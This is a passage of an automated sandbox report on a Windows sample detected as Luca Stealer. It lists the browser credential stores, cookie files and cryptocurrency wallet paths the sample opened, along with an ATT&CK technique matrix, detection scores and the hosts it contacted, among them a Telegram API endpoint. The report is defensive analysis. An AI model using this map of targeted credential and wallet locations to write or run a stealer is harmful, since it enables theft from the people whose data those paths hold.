            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoeJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: Yara matchFile source: Process Memory Space: 765iYbgWn9.exe PID: 1996, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Luca Stealer
            Source: Yara matchFile source: 765iYbgWn9.exe, type: SAMPLE
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 0.0.765iYbgWn9.exe.7ff6a5820000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: Process Memory Space: 765iYbgWn9.exe PID: 1996, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
            Windows Management Instrumentation            		1
            DLL Side-Loading            		11
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services2
            Data from Local System            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeylogging4
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            765iYbgWn9.exe50%ReversingLabsWin64.Trojan.Barys
            765iYbgWn9.exe32%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            ipwho.is0%VirustotalBrowse
            api.telegram.org2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://docs.rs/getrandom#nodejs-es-module-supportC:0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.w3.or0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://ns.adobe.0%Avira URL Cloudsafe
            https://docs.rs/getrandom#nodejs-es-module-supportC:0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ipwho.is
            		195.201.57.90
            		truefalseunknown
            api.telegram.org
            		149.154.167.220
            		truetrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://ac.ecosia.org/autocomplete?q=765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.w3.or765iYbgWn9.exefalse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/chrome_newtab765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://docs.rs/getrandom#nodejs-es-module-supportC:765iYbgWn9.exefalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://duckduckgo.com/ac/?q=765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://ns.adobe.765iYbgWn9.exefalse
            • Avira URL Cloud: safe
            		unknown
            https://www.ecosia.org/newtab/765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            149.154.167.220
            		api.telegram.orgUnited Kingdom
            		62041TELEGRAMRUtrue
            195.201.57.90
            		ipwho.isGermany
            		24940HETZNER-ASDEfalse

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1483815
            Start date and time:2024-07-29 07:31:11 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 15s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:765iYbgWn9.exe
            renamed because original name is a hash value
            Original Sample Name:0534ab10184891cd61d262bfd79b7b4c.exe
            Detection:MAL
            Classification:mal72.troj.spyw.winEXE@4/15@3/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            01:32:44API Interceptor4x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            149.154.167.220WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
              https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=Get hashmaliciousUnknownBrowse
                lHqcAkPNu8.exeGet hashmaliciousXWormBrowse
                  file.exeGet hashmaliciousClipboard HijackerBrowse
                    Nursultan Alpha Client.exeGet hashmaliciousDCRat, XWormBrowse
                      Easy Anti-Cheat Analyzer.exeGet hashmaliciousDCRat, XWormBrowse
                        encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                          encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                            QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              engine.ps1Get hashmaliciousUnknownBrowse
                                195.201.57.90WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                • /?output=json
                                ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                • ipwhois.app/xml/
                                cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                • /?output=json
                                Clipper.exeGet hashmaliciousUnknownBrowse
                                • /?output=json
                                cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                                • /?output=json
                                Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                • /?output=json
                                Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                • /?output=json
                                rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                                • /?output=json
                                Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                                • /?output=json
                                rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                • /?output=json

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                ipwho.isWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                • 195.201.57.90
                                1d686b05f745875e28939abe357baedd169b59f5a0d88.exeGet hashmaliciousQuasarBrowse
                                • 195.201.57.90
                                http://appinforyvjhf6454ms1a.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                • 195.201.57.90
                                https://l.facebook.com/l.php?u=https%3A%2F%2Fnutramart.store%2F%3Flabel%3D5efe465a4dbe59fbb290a966697fc1cd%26utm_medium%3Dpaid%26utm_source%3Dfb%26utm_id%3D6599688580361%26utm_content%3D6599688599961%26utm_term%3D6599688590961%26utm_campaign%3D6599688580361%26fbclid%3DIwZXh0bgNhZW0BMAABHdzmJULh8TsQt3pW_qnmIXPFdqLqBaBKW5T-aZYxDkCqac1lwtitUH-fNw_aem_UoCoKjZX08yMSHQS1Rk-lA&h=AT2Rbdo290L85DwdtmvCHSaYZeZQw6zVRZwOCmLUor4sXK9slv2_8Xz3sNHtiR9yk_5i3WV0TyI-vvISy2qX4eX89xJtn5joKswTFrWNikf-8BbcY1c3OSbcsV7ioNYHeRE&__tn__=%2CmH-R&c%5B0%5D=AT1zpbOywPCbT61x3IUZxcKH5NMmiyOktbAovmzxAnO3GQxZoE9RLlfDBYeXTFE8UxKMEzW4i7Rw_yO3qxx7WfbLZEKXf2a_gqDGEIqK5xACO326D8DwbL9YKGpFirOaXzMC_oPb4wgEghT5w108ehD0lVOUa18OX2Yna4VvaAaIUpPjAkk9gOhJw0AtcNc8dmXxzoPXiUwIYEI1VCwKUmK1G_lmEdu24Iq9UJ_ic75uGIJuxQwEttfLYZ0HqkC3D8EpDSqIjHE7T12pe_syL5VjKXEGR6hZ3F-YEVJbiZGhU5diMWZAvsPL2bUpvSMNWrEu14yqnXQK7Z-1xnZRSbLWmzHp53sdCj21Get hashmaliciousUnknownBrowse
                                • 195.201.57.90
                                Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                                • 195.201.57.90
                                https://kohojoiy.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                • 195.201.57.90
                                http://ofclgtaiopoi.z13.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                                • 195.201.57.90
                                http://ofclgtaiopoi.z13.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                                • 195.201.57.90
                                dzCvoZ0uLj.exeGet hashmaliciousQuasarBrowse
                                • 195.201.57.90
                                0p8KrH1qfZ.exeGet hashmaliciousQuasarBrowse
                                • 195.201.57.90
                                api.telegram.orgWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                • 149.154.167.220
                                https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=Get hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                lHqcAkPNu8.exeGet hashmaliciousXWormBrowse
                                • 149.154.167.220
                                file.exeGet hashmaliciousClipboard HijackerBrowse
                                • 149.154.167.220
                                Nursultan Alpha Client.exeGet hashmaliciousDCRat, XWormBrowse
                                • 149.154.167.220
                                Easy Anti-Cheat Analyzer.exeGet hashmaliciousDCRat, XWormBrowse
                                • 149.154.167.220
                                encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                                • 149.154.167.220
